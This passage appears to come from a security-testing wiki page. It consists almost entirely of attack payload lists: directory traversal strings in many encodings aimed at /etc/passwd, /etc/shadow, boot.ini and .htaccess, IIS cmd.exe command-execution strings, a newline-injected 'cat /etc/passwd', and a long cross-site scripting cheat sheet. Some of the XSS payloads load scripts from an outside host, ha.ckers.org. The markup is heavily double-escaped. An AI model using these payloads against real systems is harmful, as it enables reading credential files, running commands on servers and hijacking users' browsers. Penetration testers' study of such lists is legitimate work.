%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Most effective/most common statements  ===&lt;br /&gt;
&lt;br /&gt;
Testing Statements &lt;br /&gt;
&amp;lt;pre&amp;gt;';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
Common exploit code (covers a lot of XSS vulnerabilities) &lt;br /&gt;
&amp;lt;pre&amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
